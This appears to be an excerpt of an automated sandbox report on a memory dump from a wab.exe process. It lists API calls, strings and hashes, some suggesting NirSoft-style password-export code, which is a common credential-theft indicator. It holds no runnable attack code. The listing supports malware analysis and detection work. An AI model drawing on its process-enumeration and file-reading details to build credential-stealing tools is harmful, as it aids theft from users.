                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                            • DeleteObject.GDI32(?), ref: 004109D0
                                            • DeleteObject.GDI32(?), ref: 004109D6
                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            • API String ID: 1010922700-0
                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                            APIs
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • malloc.MSVCRT ref: 004186B7
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                            • malloc.MSVCRT ref: 004186FE
                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$FullNamePath$malloc$Version
                                            • String ID: |A
                                            • API String ID: 4233704886-1717621600
                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp
                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                            • API String ID: 2081463915-1959339147
                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2012295524-70141382
                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                            • API String ID: 667068680-3953557276
                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                            APIs
                                            • GetDC.USER32(00000000), ref: 004121FF
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                            • SelectObject.GDI32(?,?), ref: 00412251
                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                            • SetCursor.USER32(00000000), ref: 004122BC
                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                            • memcpy.MSVCRT ref: 0041234D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                            • String ID:
                                            • API String ID: 1700100422-0
                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                            • String ID:
                                            • API String ID: 552707033-0
                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                            • memcpy.MSVCRT ref: 0040C11B
                                            • strchr.MSVCRT ref: 0040C140
                                            • strchr.MSVCRT ref: 0040C151
                                            • _strlwr.MSVCRT ref: 0040C15F
                                            • memset.MSVCRT ref: 0040C17A
                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                            • String ID: 4$h
                                            • API String ID: 4066021378-1856150674
                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: %%0.%df
                                            • API String ID: 3473751417-763548558
                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                            APIs
                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                            • GetTickCount.KERNEL32 ref: 0040610B
                                            • GetParent.USER32(?), ref: 00406136
                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                            • String ID: A
                                            • API String ID: 2892645895-3554254475
                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                            APIs
                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                            • memset.MSVCRT ref: 0040DA23
                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                            • String ID: caption
                                            • API String ID: 973020956-4135340389
                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                            APIs
                                            Strings
                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf$wcscpy
                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                            • API String ID: 1283228442-2366825230
                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                            APIs
                                            • wcschr.MSVCRT ref: 00413972
                                            • wcscpy.MSVCRT ref: 00413982
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            • wcscpy.MSVCRT ref: 004139D1
                                            • wcscat.MSVCRT ref: 004139DC
                                            • memset.MSVCRT ref: 004139B8
                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                            • memset.MSVCRT ref: 00413A00
                                            • memcpy.MSVCRT ref: 00413A1B
                                            • wcscat.MSVCRT ref: 00413A27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                            • String ID: \systemroot
                                            • API String ID: 4173585201-1821301763
                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscpy
                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                            • API String ID: 1284135714-318151290
                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                            • String ID: 0$6
                                            • API String ID: 4066108131-3849865405
                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                            APIs
                                            • memset.MSVCRT ref: 004082EF
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memset.MSVCRT ref: 00408362
                                            • memset.MSVCRT ref: 00408377
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 290601579-0
                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memchrmemset
                                            • String ID: PD$PD
                                            • API String ID: 1581201632-2312785699
                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                            • GetDC.USER32(00000000), ref: 00409F6E
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                            • GetParent.USER32(?), ref: 00409FA5
                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                            • String ID:
                                            • API String ID: 2163313125-0
                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$wcslen
                                            • String ID:
                                            • API String ID: 239872665-3916222277
                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$_snwprintfmemset
                                            • String ID: %s (%s)$YV@
                                            • API String ID: 3979103747-598926743
                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                            APIs
                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadMessageProc
                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                            • API String ID: 2780580303-317687271
                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                            APIs
                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                            • wcslen.MSVCRT ref: 0040A6B1
                                            • wcscpy.MSVCRT ref: 0040A6C1
                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
